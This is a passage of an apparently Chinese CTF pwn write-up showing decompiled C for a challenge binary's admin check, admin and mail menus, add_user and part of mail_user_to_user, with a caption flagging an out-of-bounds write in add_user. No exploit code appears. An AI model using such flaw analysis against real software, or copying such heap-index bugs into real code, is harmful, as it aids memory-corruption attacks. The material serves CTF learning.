class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Welcome admin!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Wrong password for admin!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>检测管理员账号</p> <h4 id="admin_panel">admin_panel </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="nf">admin_panel</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v1</span><span class="p">;</span> <span class="c1">// [rsp+4h] [rbp-Ch] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// [rsp+8h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v2</span> <span class="o">=</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;=== Admin Menu ===&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;1. Change user info&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;2. Delete user&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;3. Mail to user&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;4. Mail user to user&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;5. Logout&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Your choice: &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">v1</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">__isoc99_scanf</span><span class="p">(</span><span class="s">&#34;%d&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">v1</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="nf">getchar</span><span class="p">()</span> <span class="o">!=</span> <span class="mi">10</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Invalid input!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">switch</span> <span class="p">(</span> <span class="n">v1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">case</span> <span class="mi">1</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">change_user_info</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">case</span> <span class="mi">2</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">delete_user</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">case</span> <span class="mi">3</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">mail_to_user</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">case</span> <span class="mi">4</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">mail_user_to_user</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">case</span> <span class="mi">5</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Logging out as admin...&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v2</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">default</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Invalid choice!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>管理员面板</p> <h4 id="mail_panel">mail_panel </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="kr">__fastcall</span> <span class="nf">mail_panel</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="n">a1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// [rsp+10h] [rbp-10h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// [rsp+14h] [rbp-Ch] </span></span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v4</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v4</span> <span class="o">=</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">mail_menu</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="n">v2</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">__isoc99_scanf</span><span class="p">(</span><span class="s">&#34;%d&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">v2</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="nf">getchar</span><span class="p">()</span> <span class="o">!=</span> <span class="mi">10</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Invalid input!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v2</span> <span class="o">==</span> <span class="mi">4</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v2</span> <span class="o">&gt;</span> <span class="mi">4</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">goto</span> <span class="n">LABEL_16</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">switch</span> <span class="p">(</span> <span class="n">v2</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">case</span> <span class="mi">3</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="n">v3</span> <span class="o">=</span> <span class="nf">send_mail</span><span class="p">(</span><span class="n">a1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v4</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">case</span> <span class="mi">1</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">write_mail</span><span class="p">((</span><span class="kr">__int64</span><span class="p">)</span><span class="n">a1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">case</span> <span class="mi">2</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">read_mail</span><span class="p">((</span><span class="kr">__int64</span><span class="p">)</span><span class="n">a1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">default</span><span class="o">:</span> </span></span><span class="line"><span class="cl"><span class="nl">LABEL_16</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Invalid choice!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Logging out...&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v4</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>用户面板</p> <h4 id="add_user">add_user </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kr">__int64</span> <span class="kr">__fastcall</span> <span class="nf">add_user</span><span class="p">(</span><span class="kr">__int64</span> <span class="n">a1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// [rsp+14h] [rbp-Ch] </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">i</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">j</span><span class="p">;</span> <span class="c1">// [rsp+1Ch] [rbp-4h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v2</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;=</span> <span class="mi">11</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="mi">8LL</span> <span class="o">*</span> <span class="n">i</span> <span class="o">+</span> <span class="n">a1</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="mi">8LL</span> <span class="o">*</span> <span class="n">i</span> <span class="o">+</span> <span class="n">a1</span><span class="p">)</span> <span class="o">+</span> <span class="mh">0x278LL</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="o">++</span><span class="n">v2</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v2</span> <span class="o">&lt;=</span> <span class="mi">7</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span> <span class="n">j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="p">;</span> <span class="o">++</span><span class="n">j</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">j</span> <span class="o">&gt;</span> <span class="mi">12</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mh">0xFFFFFFFFLL</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="mi">8LL</span> <span class="o">*</span> <span class="n">j</span> <span class="o">+</span> <span class="n">a1</span><span class="p">)</span> <span class="o">||</span> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="mi">8LL</span> <span class="o">*</span> <span class="n">j</span> <span class="o">+</span> <span class="n">a1</span><span class="p">)</span> <span class="o">+</span> <span class="mh">0x388LL</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="mi">8LL</span> <span class="o">*</span> <span class="n">j</span> <span class="o">+</span> <span class="n">a1</span><span class="p">)</span> <span class="o">=</span> <span class="nf">malloc</span><span class="p">(</span><span class="mh">0x410u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">memset</span><span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="kt">void</span> <span class="o">**</span><span class="p">)(</span><span class="mi">8LL</span> <span class="o">*</span> <span class="n">j</span> <span class="o">+</span> <span class="n">a1</span><span class="p">),</span> <span class="mi">0</span><span class="p">,</span> <span class="mh">0x410u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="mi">8LL</span> <span class="o">*</span> <span class="n">j</span> <span class="o">+</span> <span class="n">a1</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">perror</span><span class="p">(</span><span class="s">&#34;malloc failed&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="mi">8LL</span> <span class="o">*</span> <span class="n">j</span> <span class="o">+</span> <span class="n">a1</span><span class="p">)</span> <span class="o">+</span> <span class="mh">0x278LL</span><span class="p">)</span> <span class="o">=</span> <span class="n">j</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="mi">8LL</span> <span class="o">*</span> <span class="n">j</span> <span class="o">+</span> <span class="n">a1</span><span class="p">)</span> <span class="o">+</span> <span class="mh">0x388LL</span><span class="p">)</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="n">j</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;User full!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mh">0xFFFFFFFFLL</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>添加用户,特定情况下存在正向越界写</p> <h4 id="mail_user_to_user">mail_user_to_user </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span><span class="lnt">115 </span><span class="lnt">116 </span><span class="lnt">117 </span><span class="lnt">118 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="nf">mail_user_to_user</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v1</span><span class="p">;</span> <span class="c1">// [rsp+Ch] [rbp-34h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// [rsp+10h] [rbp-30h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// [rsp+14h] [rbp-2Ch] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kt">size_t</span> <span class="n">n</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-28h] </span></span></span><span class="line"><span class="cl"> <span class="kt">size_t</span> <span class="n">v5</span><span class="p">;</span> <span class="c1">// [rsp+20h] [rbp-20h] </span></span></span><span class="line"><span class="cl"> <span class="kt">void</span> <span class="o">*</span><span class="n">v6</span><span class="p">;</span> <span class="c1">// [rsp+28h] [rbp-18h] </span></span></span><span class="line"><span class="cl"> <span class="kt">void</span> <span class="o">*</span><span class="n">src</span><span class="p">;</span> <span class="c1">// [rsp+30h] [rbp-10h] </span></span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v8</span><span class="p">;</span> <span class="c1">// [rsp+38h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v8</span> <span class="o">=</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Enter source user ID (whose mail to forward): (1-12) &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">__isoc99_scanf</span><span class="p">(</span><span class="s">&#34;%d&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">v1</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Invalid source user ID!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="nf">getchar</span><span class="p">()</span> <span class="o">!=</span> <span class="mi">10</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">goto</span> <span class="n">ret</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Enter destination user ID (1-12): &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span 